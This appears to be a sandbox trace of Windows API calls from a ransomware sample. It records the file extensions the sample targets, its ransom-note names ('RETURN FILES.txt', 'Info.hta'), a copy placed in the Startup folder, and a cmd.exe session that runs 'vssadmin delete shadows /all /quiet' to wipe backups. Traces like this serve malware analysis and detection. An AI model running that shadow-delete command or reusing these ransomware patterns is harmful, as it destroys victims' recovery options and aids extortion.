lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0153.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6f8f98 | out: hHeap=0x6a0000) returned 1 [0153.341] lstrlenW (lpString="") returned 0 [0153.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6faf28 | out: hHeap=0x6a0000) returned 1 [0153.341] lstrlenW (lpString=".bat") returned 4 [0153.341] lstrlenW (lpString=".bat") returned 4 [0153.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6faef8 | out: hHeap=0x6a0000) returned 1 [0153.341] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6faf28, Size=0x20) returned 0x6dd8b8 [0153.341] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6dd8b8, Size=0x40) returned 0x6b76b8 [0153.341] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b76b8, Size=0x80) returned 0x6e6100 [0153.341] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b7a8, Size=0x8) returned 0x73b6d8 [0153.342] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b6d8, Size=0x10) returned 0x6faf28 [0153.342] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6faf28, Size=0x20) returned 0x6ddb10 [0153.342] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0153.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e6100 | out: hHeap=0x6a0000) returned 1 [0153.342] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6fa130, Size=0x20) returned 0x6dd9d0 [0153.342] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6dd9d0, Size=0x40) returned 0x6b76b8 [0153.342] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0153.342] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0153.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b76b8 | out: hHeap=0x6a0000) returned 1 [0153.342] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6fa1c0, Size=0x20) returned 0x6ddc28 [0153.342] lstrlenW (lpString="Info.hta") returned 8 [0153.342] lstrlenW (lpString="Info.hta") returned 8 [0153.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddc28 | out: hHeap=0x6a0000) returned 1 [0153.342] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x73b7f0, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe")) returned 0x47 [0153.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b7f0 | out: hHeap=0x6a0000) returned 1 [0153.343] lstrlenW (lpString="hgaibc.exe") returned 10 [0153.343] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddb10, Size=0x40) returned 0x6b78b0 [0153.343] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6fa0a0, Size=0x20) returned 0x6ddac0 [0153.344] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6fa0a0, Size=0x20) returned 0x6dd9a8 [0153.344] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6dd9a8, Size=0x40) returned 0x6b74c0 [0153.344] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b74c0, Size=0x80) returned 0x6e5990 [0153.344] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e5990, Size=0x100) returned 0x729e48 [0153.344] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0153.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x729e48 | out: hHeap=0x6a0000) returned 1 [0153.344] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x73b7f0, nSize=0x8000 | out: lpDst="C:\\WINDOWS;") returned 0xc [0153.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74b7f8 | out: hHeap=0x6a0000) returned 1 [0153.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b7f0 | out: hHeap=0x6a0000) returned 1 [0153.345] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b7a8, Size=0x8) returned 0x73b758 [0153.345] lstrlenW (lpString="%windir%;") returned 9 [0153.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddac0 | out: hHeap=0x6a0000) returned 1 [0153.345] lstrlenW (lpString="C:\\WINDOWS;") returned 11 [0153.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a3d8 | out: hHeap=0x6a0000) returned 1 [0153.345] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6fa0d0, Size=0x20) returned 0x6dd9f8 [0153.345] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6dd9f8, Size=0x40) returned 0x6b74c0 [0153.345] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b74c0, Size=0x80) returned 0x6e5b28 [0153.345] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e5b28, Size=0x100) returned 0x72a058 [0153.345] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b798, Size=0x8) returned 0x73b7a8 [0153.345] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b7a8, Size=0x10) returned 0x6fa190 [0153.345] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6fa190, Size=0x20) returned 0x6ddb10 [0153.345] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b718, Size=0x8) returned 0x73b7a8 [0153.345] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b668, Size=0x8) returned 0x73b778 [0153.346] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b6b8, Size=0x8) returned 0x73b628 [0153.346] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b628, Size=0x10) returned 0x6fa028 [0153.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x703068 [0153.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x73b728 [0153.706] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6fa028, Size=0x20) returned 0x6dd890 [0153.706] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b7a8, Size=0x10) returned 0x702e10 [0153.706] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b778, Size=0x10) returned 0x702f30 [0153.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x73b698 [0153.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x702e70 [0153.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x73b7a8 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x703080 [0153.707] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b7a8, Size=0x8) returned 0x73b708 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x73b778 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x702fd8 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x73b628 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x702f18 [0153.707] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b628, Size=0x8) returned 0x73b6b8 [0153.707] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x702e10, Size=0x20) returned 0x6ddc78 [0153.707] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x702f30, Size=0x20) returned 0x6ddb38 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x73b6d8 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x702d98 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x73b628 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x702e58 [0153.707] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b628, Size=0x8) returned 0x73b748 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x6b6430 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x6b6450 [0153.707] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0153.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a058 | out: hHeap=0x6a0000) returned 1 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e5330 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x73b798 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x702f30 [0153.707] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x702f30, Size=0x20) returned 0x6dd9a8 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd0) returned 0x6bc6c8 [0153.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x74b7f8 [0153.707] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x74b7f8, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0153.707] lstrlenW (lpString="C:\\") returned 3 [0153.708] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x19fca4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x19fca4*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74b7f8 | out: hHeap=0x6a0000) returned 1 [0153.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x28) returned 0x6b5760 [0153.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x702f30 [0153.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x73b7a8 [0153.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x14) returned 0x6b63b0 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x702db0 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e5dd0 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x702e10 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x7079b0 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x702f48 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x73b628 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703020 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e5ff0 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x702fa8 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2) returned 0x73b6f8 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x73b668 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x702de0 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e5bb0 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x702f60 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x73b638 [0153.709] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b6f8, Size=0x82) returned 0x707a40 [0153.709] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b638, Size=0x100) returned 0x7293f8 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x702ff0 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x707ad0 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703008 [0153.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x702800 [0153.709] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x707a40, Size=0x104) returned 0x702890 [0153.709] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x7293f8, Size=0x200) returned 0x703a60 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b668 | out: hHeap=0x6a0000) returned 1 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703a60 | out: hHeap=0x6a0000) returned 1 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x702f60 | out: hHeap=0x6a0000) returned 1 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e5ff0 | out: hHeap=0x6a0000) returned 1 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703020 | out: hHeap=0x6a0000) returned 1 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e5bb0 | out: hHeap=0x6a0000) returned 1 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x702de0 | out: hHeap=0x6a0000) returned 1 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x702890 | out: hHeap=0x6a0000) returned 1 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x702fa8 | out: hHeap=0x6a0000) returned 1 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x707ad0 | out: hHeap=0x6a0000) returned 1 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x702ff0 | out: hHeap=0x6a0000) returned 1 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x702800 | out: hHeap=0x6a0000) returned 1 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703008 | out: hHeap=0x6a0000) returned 1 [0153.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6) returned 0x73b638 [0153.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703020 [0153.711] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703020, Size=0x20) returned 0x6dd9d0 [0153.711] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6dd9d0, Size=0x40) returned 0x701d38 [0153.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x702e28 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b7a8 | out: hHeap=0x6a0000) returned 1 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x702f30 | out: hHeap=0x6a0000) returned 1 [0153.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7079b0 | out: hHeap=0x6a0000) returned 1 [0153.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x702e10 | out: hHeap=0x6a0000) returned 1 [0153.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e5dd0 | out: hHeap=0x6a0000) returned 1 [0153.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x702db0 | out: hHeap=0x6a0000) returned 1 [0153.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b628 | out: hHeap=0x6a0000) returned 1 [0153.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x702f48 | out: hHeap=0x6a0000) returned 1 [0153.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5760 | out: hHeap=0x6a0000) returned 1 [0153.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b63b0 | out: hHeap=0x6a0000) returned 1 [0153.712] lstrlenW (lpString="%systemdrive%") returned 13 [0153.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd9a8 | out: hHeap=0x6a0000) returned 1 [0153.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e5330 | out: hHeap=0x6a0000) returned 1 [0153.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b798 | out: hHeap=0x6a0000) returned 1 [0153.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x6bd0e8 [0153.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2000) returned 0x703a60 [0153.712] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x7093c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x298 [0153.713] WaitForMultipleObjects (nCount=0x2, lpHandles=0x6bb288*=0x260, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0179.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb288 | out: hHeap=0x6a0000) returned 1 [0179.535] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0179.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7478 | out: hHeap=0x6a0000) returned 1 [0179.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456cbc8 [0179.535] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456cbc8, Size=0x20) returned 0x458c358 [0179.535] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x458c358, Size=0x40) returned 0x4682678 [0179.535] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4682678, Size=0x80) returned 0x6e5f68 [0179.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456ca00 [0179.535] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456ca00, Size=0x20) returned 0x458c178 [0179.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fffc) returned 0x45aefd0 [0179.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0179.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x459bfd8 [0179.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456cb20 [0179.536] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456cb20, Size=0x20) returned 0x458c448 [0179.537] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x458c448, Size=0x40) returned 0x4682af8 [0179.537] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4682af8, Size=0x80) returned 0x6e5660 [0179.537] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e5660, Size=0x100) returned 0x72a058 [0179.537] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0179.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a058 | out: hHeap=0x6a0000) returned 1 [0179.537] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x44f0060, nSize=0x7fff | out: lpDst="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0179.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0179.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0179.537] CreatePipe (in: hReadPipe=0x19fd50, hWritePipe=0x19fd54, lpPipeAttributes=0x19fd40, nSize=0x0 | out: hReadPipe=0x19fd50*=0x2ac, hWritePipe=0x19fd54*=0x2b0) returned 1 [0179.537] CreatePipe (in: hReadPipe=0x19fdc0, hWritePipe=0x19fdc4, lpPipeAttributes=0x19fd40, nSize=0x0 | out: hReadPipe=0x19fdc0*=0x344, hWritePipe=0x19fdc4*=0x3e0) returned 1 [0179.537] SetHandleInformation (hObject=0x2b0, dwMask=0x1, dwFlags=0x0) returned 1 [0179.537] SetHandleInformation (hObject=0x344, dwMask=0x1, dwFlags=0x0) returned 1 [0179.537] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fd60*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2ac, hStdOutput=0x3e0, hStdError=0x3e0), lpProcessInformation=0x19fdb0 | out: lpCommandLine=0x0, lpProcessInformation=0x19fdb0*(hProcess=0x434, hThread=0x51c, dwProcessId=0xbb0, dwThreadId=0x9c8)) returned 1 [0179.545] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0179.545] WriteFile (in: hFile=0x2b0, lpBuffer=0x6e5f68*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x19fd5c, lpOverlapped=0x0 | out: lpBuffer=0x6e5f68*, lpNumberOfBytesWritten=0x19fd5c*=0x41, lpOverlapped=0x0) returned 1 [0179.545] CloseHandle (hObject=0x434) returned 1 [0179.545] CloseHandle (hObject=0x51c) returned 1 [0179.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0179.546] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0179.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e5f68 | out: hHeap=0x6a0000) returned 1 [0179.546] lstrlenW (lpString="%comspec%") returned 9 [0179.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c178 | out: hHeap=0x6a0000) returned 1 [0179.546] WaitForSingleObject (hHandle=0x1ec, dwMilliseconds=0x0) returned 0x102 [0179.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6770 | out: hHeap=0x6a0000) returned 1 [0179.546] ExitProcess (uExitCode=0x0) Thread: id = 30 os_tid = 0xe2c Thread: id = 34 os_tid = 0xe48 [0153.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6fa298 [0153.470] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6fa298, Size=0x20) returned 0x6ddbb0 [0153.470] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddbb0, Size=0x40) returned 0x6b76b8 [0153.470] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b76b8, Size=0x80) returned 0x6e5440 [0153.470] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e5440, Size=0x100) returned 0x729608 [0153.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6fa298 [0153.470] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6fa298, Size=0x20) returned 0x6ddc50 [0153.470] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddc50, Size=0x40) returned 0x6b78f8 [0153.470] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b78f8, Size=0x80) returned 0x6e6078 [0153.470] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e6078, Size=0x100) returned 0x729d40 [0153.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6fa208 [0153.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x73b668 [0153.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6fa220 [0153.471] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x73b668, Size=0x8) returned 0x73b628 [0153.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x6b6390 [0153.471] 